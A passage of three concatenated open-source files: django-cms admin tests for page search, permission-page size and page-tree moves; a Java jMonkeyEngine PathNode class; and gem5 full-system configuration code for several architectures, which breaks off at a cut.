            self.assertEqual(403, self.client.get(page_url).status_code)

            self.assertEqual(200,
                             self.client.get(page_url, HTTP_X_REQUESTED_WITH='XMLHttpRequest').status_code
                             )

            # Test that the query param is working as expected.
            self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q': 'main_title'},
                                                               HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))

            self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q': 'menu_title'},
                                                               HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))

            self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q': 'overwritten_url'},
                                                               HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))

            self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q': 'page_title'},
                                                               HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
class AdminPageEditContentSizeTests(AdminTestsBase):
    """
    System user count influences the size of the page edit page,
    but the users are only 2 times present on the page

    The test relates to extra=0
    at PagePermissionInlineAdminForm and ViewRestrictionInlineAdmin
    """

    def test_editpage_contentsize(self):
        """
        Expected a username only 2 times in the content, but a relationship
        between usercount and pagesize
        """
        with self.settings(CMS_PERMISSION=True):
            admin_user = self.get_superuser()
            PAGE_NAME = 'TestPage'
            USER_NAME = 'test_size_user_0'
            current_site = Site.objects.get(pk=1)
            page = create_page(PAGE_NAME, "nav_playground.html", "en", site=current_site, created_by=admin_user)
            page.save()
            self._page = page
            with self.login_user_context(admin_user):
                url = base.URL_CMS_PAGE_PERMISSION_CHANGE % self._page.pk
                response = self.client.get(url)
                self.assertEqual(response.status_code, 200)
                # Baseline: response size and user count before adding a user.
                old_response_size = len(response.content)
                old_user_count = get_user_model().objects.count()
                # create additionals user and reload the page
                # NOTE(review): passing `username=` assumes the active user
                # model accepts that kwarg — confirm against email-only
                # custom-user test configurations.
                get_user_model().objects.create_user(username=USER_NAME, email=USER_NAME + '@django-cms.org',
                                                     password=USER_NAME)
                user_count = get_user_model().objects.count()
                more_users_in_db = old_user_count < user_count
                # we have more users
                self.assertTrue(more_users_in_db, "New users got NOT created")
                response = self.client.get(url)
                new_response_size = len(response.content)
                page_size_grown = old_response_size < new_response_size
                # expect that the pagesize gets influenced by the useramount of the system
                self.assertTrue(page_size_grown, "Page size has not grown after user creation")
                # usernames are only 2 times in content
                text = smart_str(response.content, response.charset)
                foundcount = text.count(USER_NAME)
                # 2 forms contain usernames as options
                self.assertEqual(foundcount, 2,
                                 "Username %s appeared %s times in response.content, expected 2 times" % (
                                     USER_NAME, foundcount))
class AdminPageTreeTests(AdminTestsBase):
    """Exercises PageAdmin.move_page() against a small four-page tree."""
    def test_move_node(self):
        """
        Repeatedly moves pages around the tree and verifies descendant
        counts after every move. 'position' is the 0-indexed position
        among the target's (or the root's) children.
        """
        admin_user, staff = self._get_guys()
        page_admin = self.admin_class
        alpha = create_page('Alpha', 'nav_playground.html', 'en', published=True)
        beta = create_page('Beta', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
        gamma = create_page('Gamma', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
        delta = create_page('Delta', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #     ⊢ Beta
        #     ⊢ Gamma
        #     ⊢ Delta
        # Move Beta to be a child of Alpha
        data = {
            'id': beta.pk,
            'position': 0,
            'target': alpha.pk,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=beta.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #     ⊢ Gamma
        #     ⊢ Delta
        # Move Gamma to be a child of Beta
        data = {
            'id': gamma.pk,
            'position': 0,
            'target': beta.pk,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=gamma.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 2)
        self.assertEqual(beta.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #         ⊢ Gamma
        #     ⊢ Delta
        # Move Delta to be a child of Gamma (note: target is gamma.pk)
        data = {
            'id': delta.pk,
            'position': 0,
            'target': gamma.pk,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=delta.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 3)
        self.assertEqual(beta.reload().get_descendants().count(), 2)
        self.assertEqual(gamma.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #         ⊢ Gamma
        #           ⊢ Delta
        # Move Beta to the root as node #1 (positions are 0-indexed)
        data = {
            'id': beta.pk,
            'position': 1,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=beta.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 0)
        self.assertEqual(beta.reload().get_descendants().count(), 2)
        self.assertEqual(gamma.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #     ⊢ Beta
        #       ⊢ Gamma
        #         ⊢ Delta
        # Move Beta to be a child of Alpha again
        data = {
            'id': beta.pk,
            'position': 0,
            'target': alpha.pk,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=beta.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 3)
        self.assertEqual(beta.reload().get_descendants().count(), 2)
        self.assertEqual(gamma.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #         ⊢ Gamma
        #           ⊢ Delta
        # Move Gamma to the root as node #1 (positions are 0-indexed)
        data = {
            'id': gamma.pk,
            'position': 1,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=gamma.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 1)
        self.assertEqual(beta.reload().get_descendants().count(), 0)
        self.assertEqual(gamma.reload().get_descendants().count(), 1)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #     ⊢ Gamma
        #       ⊢ Delta
        # Move Delta to the root as node #1 (positions are 0-indexed)
        data = {
            'id': delta.pk,
            'position': 1,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=delta.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 1)
        self.assertEqual(beta.reload().get_descendants().count(), 0)
        self.assertEqual(gamma.reload().get_descendants().count(), 0)
        # Current structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #     ⊢ Delta
        #     ⊢ Gamma
        # Move Gamma to be a child of Delta
        data = {
            'id': gamma.pk,
            'position': 1,
            'target': delta.pk,
        }
        with self.login_user_context(admin_user):
            request = self.get_request(post_data=data)
            response = page_admin.move_page(request, page_id=gamma.pk)
            data = json.loads(response.content.decode('utf8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data['status'], 200)
        self.assertEqual(alpha.reload().get_descendants().count(), 1)
        self.assertEqual(beta.reload().get_descendants().count(), 0)
        self.assertEqual(gamma.reload().get_descendants().count(), 0)
        self.assertEqual(delta.reload().get_descendants().count(), 1)
        # Final structure:
        #   <root>
        #     ⊢ Alpha
        #       ⊢ Beta
        #     ⊢ Delta
        #       ⊢ Gamma
| timgraham/django-cms | cms/tests/test_admin.py | Python | bsd-3-clause | 63,904 |
package necromunda;
import java.util.*;
import com.jme3.material.Material;
import com.jme3.scene.*;
/**
 * Scene-graph node representing a single step of a movement path.
 *
 * The node's visual representation is a single child spatial named
 * "pathBoxGeometry"; every accessor below operates on that child.
 */
public class PathNode extends NecromundaNode {
	/** Name of the box geometry child used to visualize this path step. */
	private static final String PATH_BOX_GEOMETRY = "pathBoxGeometry";

	public PathNode(String name) {
		super(name);
	}

	/** Applies the given material to the path box geometry. */
	public void setMaterial(Material material) {
		getChild(PATH_BOX_GEOMETRY).setMaterial(material);
	}

	/** Returns the bounding geometry of this node: just the path box itself. */
	public List<Geometry> getBoundingVolumes() {
		List<Geometry> volumes = new ArrayList<Geometry>();
		volumes.add((Geometry) getChild(PATH_BOX_GEOMETRY));
		return volumes;
	}

	@Override
	public List<Spatial> getVisualSpatials() {
		List<Spatial> visuals = new ArrayList<Spatial>();
		visuals.add(getChild(PATH_BOX_GEOMETRY));
		return visuals;
	}
}
| Tibotanum/Necromunda | src/necromunda/PathNode.java | Java | bsd-3-clause | 749 |
# Copyright (c) 2010-2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2010-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Kevin Lim
from m5.objects import *
from Benchmarks import *
from m5.util import *
class CowIdeDisk(IdeDisk):
    # IDE disk backed by a writable copy-on-write overlay on top of a
    # read-only raw disk image, so the underlying image file stays pristine.
    image = CowDiskImage(child=RawDiskImage(read_only=True),
                         read_only=False)
    def childImage(self, ci):
        # Point the underlying read-only image at the given file path.
        self.image.child.image_file = ci
class MemBus(CoherentXBar):
    # Coherent memory crossbar; accesses to unmapped addresses are routed to
    # a BadAddr responder instead of erroring out in the interconnect.
    badaddr_responder = BadAddr()
    default = Self.badaddr_responder.pio
def makeLinuxAlphaSystem(mem_mode, mdesc = None, ruby = False):
    """
    Build a Linux/Alpha full system around the Tsunami platform.

    mem_mode -- memory system mode (e.g. 'timing' or 'atomic')
    mdesc    -- SysConfig machine description; a default one is created
                when None
    ruby     -- when True, defer DMA connections to Ruby instead of
                building the classic membus/bridge topology
    """
    class BaseTsunami(Tsunami):
        ethernet = NSGigE(pci_bus=0, pci_dev=1, pci_func=0)
        ide = IdeController(disks=[Parent.disk0, Parent.disk2],
                            pci_func=0, pci_dev=0, pci_bus=0)
    self = LinuxAlphaSystem()
    if not mdesc:
        # generic system
        mdesc = SysConfig()
    self.readfile = mdesc.script()
    self.tsunami = BaseTsunami()
    # Create the io bus to connect all device ports
    self.iobus = NoncoherentXBar()
    self.tsunami.attachIO(self.iobus)
    self.tsunami.ide.pio = self.iobus.master
    self.tsunami.ide.config = self.iobus.master
    self.tsunami.ethernet.pio = self.iobus.master
    self.tsunami.ethernet.config = self.iobus.master
    if ruby:
        # Store the dma devices for later connection to dma ruby ports.
        # Append an underscore to dma_ports to avoid the SimObjectVector check.
        self._dma_ports = [self.tsunami.ide.dma, self.tsunami.ethernet.dma]
    else:
        self.membus = MemBus()
        # By default the bridge responds to all addresses above the I/O
        # base address (including the PCI config space)
        IO_address_space_base = 0x80000000000
        self.bridge = Bridge(delay='50ns',
                             ranges = [AddrRange(IO_address_space_base, Addr.max)])
        self.bridge.master = self.iobus.slave
        self.bridge.slave = self.membus.master
        self.tsunami.ide.dma = self.iobus.slave
        self.tsunami.ethernet.dma = self.iobus.slave
        self.system_port = self.membus.slave
    self.mem_ranges = [AddrRange(mdesc.mem())]
    self.disk0 = CowIdeDisk(driveID='master')
    self.disk2 = CowIdeDisk(driveID='master')
    self.disk0.childImage(mdesc.disk())
    self.disk2.childImage(disk('linux-bigswap2.img'))
    self.simple_disk = SimpleDisk(disk=RawDiskImage(image_file = mdesc.disk(),
                                                    read_only = True))
    self.intrctrl = IntrControl()
    self.mem_mode = mem_mode
    self.terminal = Terminal()
    self.kernel = binary('vmlinux')
    self.pal = binary('ts_osfpal')
    self.console = binary('console')
    self.boot_osflags = 'root=/dev/hda1 console=ttyS0'
    return self
def makeSparcSystem(mem_mode, mdesc = None):
    """
    Build a SPARC full system around the T1000 platform.

    mem_mode -- memory system mode (e.g. 'timing' or 'atomic')
    mdesc    -- SysConfig machine description; a default one is created
                when None
    """
    # Constants from iob.cc and uart8250.cc
    iob_man_addr = 0x9800000000
    uart_pio_size = 8
    class CowMmDisk(MmDisk):
        # Memory-mapped disk with a copy-on-write overlay over a read-only image.
        image = CowDiskImage(child=RawDiskImage(read_only=True),
                             read_only=False)
        def childImage(self, ci):
            self.image.child.image_file = ci
    self = SparcSystem()
    if not mdesc:
        # generic system
        mdesc = SysConfig()
    self.readfile = mdesc.script()
    self.iobus = NoncoherentXBar()
    self.membus = MemBus()
    self.bridge = Bridge(delay='50ns')
    self.t1000 = T1000()
    self.t1000.attachOnChipIO(self.membus)
    self.t1000.attachIO(self.iobus)
    self.mem_ranges = [AddrRange(Addr('1MB'), size = '64MB'),
                       AddrRange(Addr('2GB'), size ='256MB')]
    self.bridge.master = self.iobus.slave
    self.bridge.slave = self.membus.master
    self.rom.port = self.membus.master
    self.nvram.port = self.membus.master
    self.hypervisor_desc.port = self.membus.master
    self.partition_desc.port = self.membus.master
    self.intrctrl = IntrControl()
    self.disk0 = CowMmDisk()
    self.disk0.childImage(disk('disk.s10hw2'))
    self.disk0.pio = self.iobus.master
    # The puart0 and hvuart are placed on the IO bus, so create ranges
    # for them. The remaining IO range is rather fragmented, so poke
    # holes for the iob and partition descriptors etc.
    self.bridge.ranges = \
        [
        AddrRange(self.t1000.puart0.pio_addr,
                  self.t1000.puart0.pio_addr + uart_pio_size - 1),
        AddrRange(self.disk0.pio_addr,
                  self.t1000.fake_jbi.pio_addr +
                  self.t1000.fake_jbi.pio_size - 1),
        AddrRange(self.t1000.fake_clk.pio_addr,
                  iob_man_addr - 1),
        AddrRange(self.t1000.fake_l2_1.pio_addr,
                  self.t1000.fake_ssi.pio_addr +
                  self.t1000.fake_ssi.pio_size - 1),
        AddrRange(self.t1000.hvuart.pio_addr,
                  self.t1000.hvuart.pio_addr + uart_pio_size - 1)
        ]
    self.reset_bin = binary('reset_new.bin')
    self.hypervisor_bin = binary('q_new.bin')
    self.openboot_bin = binary('openboot_new.bin')
    self.nvram_bin = binary('nvram1')
    self.hypervisor_desc_bin = binary('1up-hv.bin')
    self.partition_desc_bin = binary('1up-md.bin')
    self.system_port = self.membus.slave
    return self
def makeArmSystem(mem_mode, machine_type, mdesc = None,
                  dtb_filename = None, bare_metal=False,
                  sdcard_image = "sdcard-1g-mxplayer.img"):
    """
    Build an ARM full system for the given RealView/VExpress machine type.

    mem_mode     -- memory system mode (e.g. 'timing' or 'atomic')
    machine_type -- one of RealView_PBX, RealView_EB, VExpress_ELT,
                    VExpress_EMM, VExpress_EMM64
    mdesc        -- SysConfig machine description; default created when None
    dtb_filename -- optional device tree blob passed to the kernel
    bare_metal   -- when True build a bare ArmSystem (no Linux) that ends
                    the simulation on an EOT character from the UART
    sdcard_image -- disk image exposed as the second CF/IDE disk
    """
    assert machine_type
    if bare_metal:
        self = ArmSystem()
    else:
        self = LinuxArmSystem()
    if not mdesc:
        # generic system
        mdesc = SysConfig()
    self.readfile = mdesc.script()
    self.iobus = NoncoherentXBar()
    self.membus = MemBus()
    self.membus.badaddr_responder.warn_access = "warn"
    self.bridge = Bridge(delay='50ns')
    self.bridge.master = self.iobus.slave
    self.bridge.slave = self.membus.master
    self.mem_mode = mem_mode
    if machine_type == "RealView_PBX":
        self.realview = RealViewPBX()
    elif machine_type == "RealView_EB":
        self.realview = RealViewEB()
    elif machine_type == "VExpress_ELT":
        self.realview = VExpress_ELT()
    elif machine_type == "VExpress_EMM":
        self.realview = VExpress_EMM()
    elif machine_type == "VExpress_EMM64":
        self.realview = VExpress_EMM64()
    else:
        # Fix: the old "print ...; sys.exit(1)" path would have raised a
        # NameError because 'sys' is never imported in this file. Use m5's
        # fatal() (already imported via m5.util and used below) instead.
        fatal("Unknown machine type: %s", machine_type)
    self.cf0 = CowIdeDisk(driveID='master')
    self.cf2 = CowIdeDisk(driveID='master')
    self.cf0.childImage(mdesc.disk())
    self.cf2.childImage(disk(sdcard_image))
    # Attach any PCI devices this platform supports
    self.realview.attachPciDevices()
    # default to an IDE controller rather than a CF one
    try:
        self.realview.ide.disks = [self.cf0, self.cf2]
    except:
        self.realview.cf_ctrl.disks = [self.cf0, self.cf2]
    if bare_metal:
        # EOT character on UART will end the simulation
        self.realview.uart.end_on_eot = True
        self.mem_ranges = [AddrRange(self.realview.mem_start_addr,
                                     size = mdesc.mem())]
    else:
        if machine_type == "VExpress_EMM64":
            self.kernel = binary('vmlinux-3.16-aarch64-vexpress-emm64-pcie')
        elif machine_type == "VExpress_EMM":
            self.kernel = binary('vmlinux-3.3-arm-vexpress-emm-pcie')
        else:
            self.kernel = binary('vmlinux.arm.smp.fb.2.6.38.8')
        if dtb_filename:
            self.dtb_filename = binary(dtb_filename)
        self.machine_type = machine_type
        # Ensure that writes to the UART actually go out early in the boot
        boot_flags = 'earlyprintk=pl011,0x1c090000 console=ttyAMA0 ' + \
                     'lpj=19988480 norandmaps rw loglevel=8 ' + \
                     'mem=%s root=/dev/sda1' % mdesc.mem()
        # Spread the requested memory size over the platform's physical
        # memory regions, warning whenever it spills into another region.
        self.mem_ranges = []
        size_remain = long(Addr(mdesc.mem()))
        for region in self.realview._mem_regions:
            if size_remain > long(region[1]):
                self.mem_ranges.append(AddrRange(region[0], size=region[1]))
                size_remain = size_remain - long(region[1])
            else:
                self.mem_ranges.append(AddrRange(region[0], size=size_remain))
                size_remain = 0
                break
            warn("Memory size specified spans more than one region. Creating" \
                 " another memory controller for that range.")
        if size_remain > 0:
            fatal("The currently selected ARM platforms doesn't support" \
                  " the amount of DRAM you've selected. Please try" \
                  " another platform")
        self.realview.setupBootLoader(self.membus, self, binary)
        self.gic_cpu_addr = self.realview.gic.cpu_addr
        self.flags_addr = self.realview.realview_io.pio_addr + 0x30
        if mdesc.disk().lower().count('android'):
            boot_flags += " init=/init "
        self.boot_osflags = boot_flags
    self.realview.attachOnChipIO(self.membus, self.bridge)
    self.realview.attachIO(self.iobus)
    self.intrctrl = IntrControl()
    self.terminal = Terminal()
    self.vncserver = VncServer()
    self.system_port = self.membus.slave
    return self
def makeLinuxMipsSystem(mem_mode, mdesc = None):
    """
    Build a Linux/MIPS full system around the Malta platform.

    mem_mode -- memory system mode (e.g. 'timing' or 'atomic')
    mdesc    -- SysConfig machine description; a default one is created
                when None
    """
    class BaseMalta(Malta):
        ethernet = NSGigE(pci_bus=0, pci_dev=1, pci_func=0)
        ide = IdeController(disks=[Parent.disk0, Parent.disk2],
                            pci_func=0, pci_dev=0, pci_bus=0)
    self = LinuxMipsSystem()
    if not mdesc:
        # generic system
        mdesc = SysConfig()
    self.readfile = mdesc.script()
    self.iobus = NoncoherentXBar()
    self.membus = MemBus()
    self.bridge = Bridge(delay='50ns')
    self.mem_ranges = [AddrRange('1GB')]
    self.bridge.master = self.iobus.slave
    self.bridge.slave = self.membus.master
    self.disk0 = CowIdeDisk(driveID='master')
    self.disk2 = CowIdeDisk(driveID='master')
    self.disk0.childImage(mdesc.disk())
    self.disk2.childImage(disk('linux-bigswap2.img'))
    self.malta = BaseMalta()
    self.malta.attachIO(self.iobus)
    self.malta.ide.pio = self.iobus.master
    self.malta.ide.config = self.iobus.master
    self.malta.ide.dma = self.iobus.slave
    self.malta.ethernet.pio = self.iobus.master
    self.malta.ethernet.config = self.iobus.master
    self.malta.ethernet.dma = self.iobus.slave
    self.simple_disk = SimpleDisk(disk=RawDiskImage(image_file = mdesc.disk(),
                                                    read_only = True))
    self.intrctrl = IntrControl()
    self.mem_mode = mem_mode
    self.terminal = Terminal()
    self.kernel = binary('mips/vmlinux')
    self.console = binary('mips/console')
    self.boot_osflags = 'root=/dev/hda1 console=ttyS0'
    self.system_port = self.membus.slave
    return self
def x86IOAddress(port):
    """
    Translate a legacy x86 I/O port number into the physical address at
    which gem5 maps the I/O port space.
    """
    # Base of the memory-mapped I/O port space; mirrors x86_traits.hh.
    io_space_base = 0x8000000000000000
    return io_space_base + port
def connectX86ClassicSystem(x86_sys, numCPUs):
    """
    Create and wire the classic-memory-system buses for an x86 system:
    the coherent membus, the noncoherent iobus, the north-bridge between
    them, and a second bridge so devices can reach the per-CPU local APIC
    ranges.
    """
    # Constants similar to x86_traits.hh
    IO_address_space_base = 0x8000000000000000
    pci_config_address_space_base = 0xc000000000000000
    interrupts_address_space_base = 0xa000000000000000
    APIC_range_size = 1 << 12  # 4 KiB (stray trailing ';' removed)
    x86_sys.membus = MemBus()
    # North Bridge
    x86_sys.iobus = NoncoherentXBar()
    x86_sys.bridge = Bridge(delay='50ns')
    x86_sys.bridge.master = x86_sys.iobus.slave
    x86_sys.bridge.slave = x86_sys.membus.master
    # Allow the bridge to pass through the IO APIC (two pages),
    # everything in the IO address range up to the local APIC, and
    # then the entire PCI address space and beyond
    x86_sys.bridge.ranges = \
        [
        AddrRange(x86_sys.pc.south_bridge.io_apic.pio_addr,
                  x86_sys.pc.south_bridge.io_apic.pio_addr +
                  APIC_range_size - 1),
        AddrRange(IO_address_space_base,
                  interrupts_address_space_base - 1),
        AddrRange(pci_config_address_space_base,
                  Addr.max)
        ]
    # Create a bridge from the IO bus to the memory bus to allow access to
    # the local APIC (two pages)
    x86_sys.apicbridge = Bridge(delay='50ns')
    x86_sys.apicbridge.slave = x86_sys.iobus.master
    x86_sys.apicbridge.master = x86_sys.membus.slave
    x86_sys.apicbridge.ranges = [AddrRange(interrupts_address_space_base,
                                           interrupts_address_space_base +
                                           numCPUs * APIC_range_size
                                           - 1)]
    # connect the io bus
    x86_sys.pc.attachIO(x86_sys.iobus)
    x86_sys.system_port = x86_sys.membus.slave
def connectX86RubySystem(x86_sys):
    """
    Wire an x86 system for the Ruby memory model: only the iobus is built
    here; DMA devices are collected for later attachment to Ruby DMA ports.
    """
    # North Bridge
    x86_sys.iobus = NoncoherentXBar()
    # add the ide to the list of dma devices that later need to attach to
    # dma controllers
    x86_sys._dma_ports = [x86_sys.pc.south_bridge.ide.dma]
    x86_sys.pc.attachIO(x86_sys.iobus, x86_sys._dma_ports)
def makeX86System(mem_mode, numCPUs = 1, mdesc = None, self = None,
                  Ruby = False):
    """
    Populate an x86 full system: memory ranges, PC platform, buses, disks,
    SMBios structures and the Intel MP table. If 'self' is None a plain
    X86System is created; otherwise the passed system object is filled in
    (as done by makeLinuxX86System).
    """
    if self == None:
        self = X86System()
    if not mdesc:
        # generic system
        mdesc = SysConfig()
    self.readfile = mdesc.script()
    self.mem_mode = mem_mode
    # Physical memory
    # On the PC platform, the memory region 0xC0000000-0xFFFFFFFF is reserved
    # for various devices. Hence, if the physical memory size is greater than
    # 3GB, we need to split it into two parts.
    excess_mem_size = \
        convert.toMemorySize(mdesc.mem()) - convert.toMemorySize('3GB')
    if excess_mem_size <= 0:
        self.mem_ranges = [AddrRange(mdesc.mem())]
    else:
        warn("Physical memory size specified is %s which is greater than " \
             "3GB. Twice the number of memory controllers would be " \
             "created." % (mdesc.mem()))
        self.mem_ranges = [AddrRange('3GB'),
            AddrRange(Addr('4GB'), size = excess_mem_size)]
    # Platform
    self.pc = Pc()
    # Create and connect the busses required by each memory system
    if Ruby:
        connectX86RubySystem(self)
    else:
        connectX86ClassicSystem(self, numCPUs)
    self.intrctrl = IntrControl()
    # Disks
    disk0 = CowIdeDisk(driveID='master')
    disk2 = CowIdeDisk(driveID='master')
    disk0.childImage(mdesc.disk())
    disk2.childImage(disk('linux-bigswap2.img'))
    self.pc.south_bridge.ide.disks = [disk0, disk2]
    # Add in a Bios information structure.
    structures = [X86SMBiosBiosInformation()]
    self.smbios_table.structures = structures
    # Set up the Intel MP table
    base_entries = []
    ext_entries = []
    # One processor entry per CPU; CPU 0 is the bootstrap processor.
    for i in xrange(numCPUs):
        bp = X86IntelMPProcessor(
                local_apic_id = i,
                local_apic_version = 0x14,
                enable = True,
                bootstrap = (i == 0))
        base_entries.append(bp)
    io_apic = X86IntelMPIOAPIC(
            id = numCPUs,
            version = 0x11,
            enable = True,
            address = 0xfec00000)
    self.pc.south_bridge.io_apic.apic_id = io_apic.id
    base_entries.append(io_apic)
    isa_bus = X86IntelMPBus(bus_id = 0, bus_type='ISA')
    base_entries.append(isa_bus)
    pci_bus = X86IntelMPBus(bus_id = 1, bus_type='PCI')
    base_entries.append(pci_bus)
    connect_busses = X86IntelMPBusHierarchy(bus_id=0,
            subtractive_decode=True, parent_bus=1)
    ext_entries.append(connect_busses)
    pci_dev4_inta = X86IntelMPIOIntAssignment(
            interrupt_type = 'INT',
            polarity = 'ConformPolarity',
            trigger = 'ConformTrigger',
            source_bus_id = 1,
            source_bus_irq = 0 + (4 << 2),
            dest_io_apic_id = io_apic.id,
            dest_io_apic_intin = 16)
    base_entries.append(pci_dev4_inta)
    def assignISAInt(irq, apicPin):
        # Route an ISA IRQ both through the legacy 8259 (ExtInt) and to the
        # given IO APIC pin.
        assign_8259_to_apic = X86IntelMPIOIntAssignment(
                interrupt_type = 'ExtInt',
                polarity = 'ConformPolarity',
                trigger = 'ConformTrigger',
                source_bus_id = 0,
                source_bus_irq = irq,
                dest_io_apic_id = io_apic.id,
                dest_io_apic_intin = 0)
        base_entries.append(assign_8259_to_apic)
        assign_to_apic = X86IntelMPIOIntAssignment(
                interrupt_type = 'INT',
                polarity = 'ConformPolarity',
                trigger = 'ConformTrigger',
                source_bus_id = 0,
                source_bus_irq = irq,
                dest_io_apic_id = io_apic.id,
                dest_io_apic_intin = apicPin)
        base_entries.append(assign_to_apic)
    assignISAInt(0, 2)
    assignISAInt(1, 1)
    for i in range(3, 15):
        assignISAInt(i, i)
    self.intel_mp_table.base_entries = base_entries
    self.intel_mp_table.ext_entries = ext_entries
def makeLinuxX86System(mem_mode, numCPUs = 1, mdesc = None,
                       Ruby = False):
    """
    Build a Linux/x86 full system: sets up the generic x86 system via
    makeX86System(), then adds the e820 memory map, kernel command line
    and kernel binary.
    """
    self = LinuxX86System()
    # Build up the x86 system and then specialize it for Linux
    makeX86System(mem_mode, numCPUs, mdesc, self, Ruby)
    # We assume below that there's at least 1MB of memory. We'll require 2
    # just to avoid corner cases.
    phys_mem_size = sum(map(lambda r: r.size(), self.mem_ranges))
    assert(phys_mem_size >= 0x200000)
    assert(len(self.mem_ranges) <= 2)
    entries = \
       [
        # Mark the first megabyte of memory as reserved
        X86E820Entry(addr = 0, size = '639kB', range_type = 1),
        X86E820Entry(addr = 0x9fc00, size = '385kB', range_type = 2),
        # Mark the rest of physical memory as available
        X86E820Entry(addr = 0x100000,
                size = '%dB' % (self.mem_ranges[0].size() - 0x100000),
                range_type = 1),
        # Reserve the last 64kB of the 32-bit address space for the
        # m5op interface (0xFFFF0000-0xFFFFFFFF)
        X86E820Entry(addr=0xFFFF0000, size='64kB', range_type=2),
        ]
    # In case the physical memory is greater than 3GB, we split it into two
    # parts and add a separate e820 entry for the second part. This entry
    # starts at 0x100000000,  which is the first address after the space
    # reserved for devices.
    if len(self.mem_ranges) == 2:
        entries.append(X86E820Entry(addr = 0x100000000,
            size = '%dB' % (self.mem_ranges[1].size()), range_type = 1))
    self.e820_table.entries = entries
    # Command line
    self.boot_osflags = 'earlyprintk=ttyS0 console=ttyS0 lpj=7999923 ' + \
                        'root=/dev/hda1'
    self.kernel = binary('x86_64-vmlinux-2.6.22.9')
    return self
def makeDualRoot(full_system, testSystem, driveSystem, dumpfile):
